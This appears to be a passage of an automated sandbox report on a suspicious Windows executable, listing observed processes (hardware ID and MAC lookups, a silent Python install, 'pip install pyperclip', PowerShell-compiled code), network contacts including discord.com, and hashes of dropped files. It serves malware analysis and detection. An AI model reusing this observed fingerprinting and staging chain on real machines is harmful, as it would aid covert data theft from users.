C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Users\Admin\AppData\Local\Temp\python-installer.exe
C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
"C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | www.python.org | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 151.101.192.223:443 | www.python.org | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.192.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
memory/1684-73-0x00007FFCC52D3000-0x00007FFCC52D5000-memory.dmp
memory/1684-74-0x0000025E949B0000-0x0000025E949D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5nes5k.x1a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1684-84-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp
memory/1684-85-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1
| MD5 | cbb9a56c9c8d7c3494b508934ace0b98 |
| SHA1 | e76539db673cc1751864166494d4d3d1761cb117 |
| SHA256 | 027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5 |
| SHA512 | f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129 |
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline
| MD5 | 366d6358ae0e764d01dfab337fd1bdd1 |
| SHA1 | ccbdeb65c9943677f987e4d26922eb0c05808abc |
| SHA256 | 836f090daaf42522286d8a9882a61655fe67920f6f816c4c1ce8b87db6329a7b |
| SHA512 | 7b9371aff7fa2de3533baeb5eae03643bcfdb38c6897907fc206463fb12beef2b2b8b70067b4062d7afb896357a7663beef03c0ddd15569b9451b34432e5d301 |
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.0.cs
| MD5 | ecbf151f81ff98f7dff196304a40239e |
| SHA1 | ccf6b97b6f8276656b042d64f0595963fe9ec79c |
| SHA256 | 295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8 |
| SHA512 | 4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720 |
\??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP
| MD5 | d934ed5c0ef301a1a78f18c914a14d1d |
| SHA1 | b94488c6a4b4e72ebc8cd3433cc69ac4186b3016 |
| SHA256 | 0eed5958828bc41a8bbd27a6d2f0522dc00d7aa3cfde654459839641722ff5f1 |
| SHA512 | 3c89f67ce422fe94fcdef09b56a0bf76eef1ef67769fd8c5c82a08c356188b3cacf04cac701623663f11c86726b0456367bb7574aa403aeff7ad208e31f497b0 |
C:\Users\Admin\AppData\Local\Temp\RESA875.tmp
| MD5 | 9bd689e5278ac26e84b0e7866908535b |
| SHA1 | e59041d291a32e63674f343f4ba130dd4e19ca5c |
| SHA256 | f26252720fdb4f39511608db9e63c7139fa4f43420e9441723be477256fd546e |
| SHA512 | 133f4a86d10edd31426b1cea778470f66c4abf252ae602e7af124393c6880844f36368a7fd36a12be6004e03a1c452e6f21129bde0a25fba5ad73db9a084dd53 |
memory/1684-99-0x0000025E949E0000-0x0000025E949E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.dll
| MD5 | 31f88152d1e3349c4902bce5e8c3b3c7 |
| SHA1 | a976dad2cc8e6d0963282666dece8feda511cde6 |
| SHA256 | f1c2017af6fd652ec105f50b0ac205b9640847306dcc1793737cca00ddae6368 |
| SHA512 | 98ec2fb0fce497cab8c0b4647fecf680ff799a70c58399f71a571f2334373f5edf277017deade4c9f2b391188d2b388d855b96fb384188b7968c938bc9ff2207 |
memory/1684-103-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e89c193840c8fb53fc3de104b1c4b092 |
| SHA1 | 8b41b6a392780e48cc33e673cf4412080c42981e |
| SHA256 | 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c |
| SHA512 | 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2 |
memory/4584-116-0x000001C8FF830000-0x000001C8FF880000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e86a2f4d6dec82df96431112380a87e6 |
| SHA1 | 2dc61fae82770528bee4fe5733a8ac3396012e79 |
| SHA256 | dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a |
| SHA512 | 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5 |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UseBackup.xlsx
| MD5 | aad09e5816b356fce7964daaec14d955 |
| SHA1 | 1594e6629cdfd7978c48f98456d219e19be227d2 |
| SHA256 | 6ae6c5e94701c9f0bb9930b2c0723e85d1449689c274d607095a6ac9710acacc |
| SHA512 | 064995bf6774f00ba509caaf8a0179f8c1ff431f273c24aaf5c7f48b62a040156f5517347ecd95fde712cf187f6b9221c90607b18fe18cf3b597921eebc005bc |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UnlockBackup.txt
| MD5 | be2290f73ddcedef156d4155202f3c20 |
| SHA1 | ea98970dbf35bd3b1b556abdfb09660f1cc08ec9 |
| SHA256 | eb980ff4233547e5488beb4e58685c2998ef0fd1909674c82ff2285a0b83c567 |
| SHA512 | 05d0d0d6df69e311f73c1d7cfb35279c2b696105cbdc115f43f98466c5cf030d2be31d76104b70456933f2b03bac74b1294dac8937f922190747f88953e686a9 |
C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\BackupStart.csv
| MD5 | 6babe9070e590172a9797afb604cfb90 |
| SHA1 | c8aac29f9220e399a829fb02b07c66396481bc82 |
| SHA256 | 72bf9fb0dfb94a02559b2be4519178ceb1bb63b837b7cb0a7d8192154a0622ad |
| SHA512 | 5190ebedd44ed2e31dbba51d12d911ec56102c8b3853698bad46a1c6e9608b336588aa1ee91954c237fc4bb1e58418d1f280e41737e4f1d24eb58b1bfa935548 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7bde4b527f6c280b58f471b90da7fac8 |
| SHA1 | d5b685a260a01dd33f8732c8cbc976b2989f6188 |
| SHA256 | 38ad355760e10eabaa9a9f00436975e1c1e1323e383412abdb108f2980cc7911 |
| SHA512 | c2d95bf41e99e07f77a49be23bc143a785a5544474cf6c40e4d93b89d48e25afb36964368f3c5aedb5d253cb3debe5ed4b08ce3e8d955d0758cfb744f3535a6c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fa62682ae5c4db5ff5c8081be40619a3 |
| SHA1 | c8492e65565a2bf0913cf501fbd4109e22f32ef3 |
| SHA256 | 044ae72c1d6bd0d35731d675cad25040163bc0d06970772bd7b04e79b7b7618a |
| SHA512 | fa940f723775420022e5f58e276d8f5ddba51dbe17a7227ab349a34498e687bb1159d0615a17a68d1a5416cc0c103951bdb05856dd984856703f16733bd8b5fd |
C:\Users\Admin\AppData\Local\Temp\python-installer.exe
| MD5 | d8548aa7609a762ba66f62eeb2ca862d |
| SHA1 | 2eb85b73cab52693d3a27446b7de1c300cc05655 |
| SHA256 | 5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a |
| SHA512 | 37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c |
C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
| MD5 | 931227a65a32cebf1c10a99655ad7bbd |
| SHA1 | 1b874fdef892a2af2501e1aaea3fcafb4b4b00c6 |
| SHA256 | 1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d |
| SHA512 | 0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\PythonBA.dll
| MD5 | 8c8e5a5ca0483abdc6ad6ef22c73b5d2 |
| SHA1 | 9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc |
| SHA256 | edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43 |
| SHA512 | 861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\SideBar.png
| MD5 | 888eb713a0095756252058c9727e088a |
| SHA1 | c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4 |
| SHA256 | 79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067 |
| SHA512 | 7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0 |
C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\pip_JustForMe
| MD5 | 494f112096b61cb01810df0e419fb93c |
| SHA1 | 295c32c8e1654810c4807e42ba2438c8da39756a |
| SHA256 | 2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80 |
| SHA512 | 9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704 |
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe
| MD5 | f6ddadd0d817ce569e202e57863ae919 |
| SHA1 | 3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2 |
| SHA256 | 63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1 |
| SHA512 | 7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2 |
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe
| MD5 | fd7e13f2c36fe528afc7a05892b34695 |
| SHA1 | 14a9c4dfd12e1f9b1e64e110166500be1ef0abb1 |
| SHA256 | 2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0 |
| SHA512 | 7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f |
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_000_core_JustForMe.log
| MD5 | 9f190f62aace0367c91a959cc11ea7db |
| SHA1 | df84e4a53a2d563fee16f1aadb04972ea4307a8e |
| SHA256 | 154b0f66e674f0280637d37b66c4b89e5bfd8ecd81441bf9d0f567266c39288d |
| SHA512 | 55b7040a6d86b5b4a0a6fe06071a712242b9ace0f29431621ec81c382e4f52a35bb79b6d995a7e19c9770436e5531db03475f5d4331eeb4f4d355a2175e6955e |
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi
| MD5 | d4c1f834f30032f220409a17e0f688cd |
| SHA1 | 61dc90b164c3797456a8ed775b353a087054fd0f |
| SHA256 | 675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12 |
| SHA512 | b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f |
C:\Config.Msi\e57de3d.rbs
| MD5 | 48a46d6b43040711c0339edd00fc86a5 |
| SHA1 | f9216314a251fa6d35004b4c4092fd533259f0ee |
| SHA256 | 4241d8b5549ca50e0072e81c527f094f37f3e7f467654fe73d794b20c12e9fb4 |
| SHA512 | 4d84d96dfa0f365ef905c519301110428d162d43c0b0dabfe3525c44f2a4f516dbc267070957ce6bbda441b5e33aa75f97c864a1dda097fd533d5916d0f680b5 |
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_001_exe_JustForMe.log
| MD5 | ff82da4f8a0c5548cc732f210c8b52b8 |
| SHA1 | 2e05b46beae3f3ae7cbdfa43b7f2cac790b014e6 |
| SHA256 | 8a102c85ee623ee6710178fa0af65611b668758ccb3314c0a9ce141aa6929652 |
| SHA512 | 57ea4ddfd570c901c0e751cdc7dbf91a0767086baf3e3d069d79e0e02de94078cd6ae89ee434c773b45c12fb044b494242e8e4262de8af589e4f9af7f6854b83 |
C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi
| MD5 | 2db9e147e0fd938c6d3c1e7cf6942496 |
| SHA1 | e4333f4334b5df6f88958e03ad18b54e64a1331f |
| SHA256 | 9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab |
| SHA512 | 4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 02:47
Reported
2024-11-04 02:50
Platform
win7-20240903-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"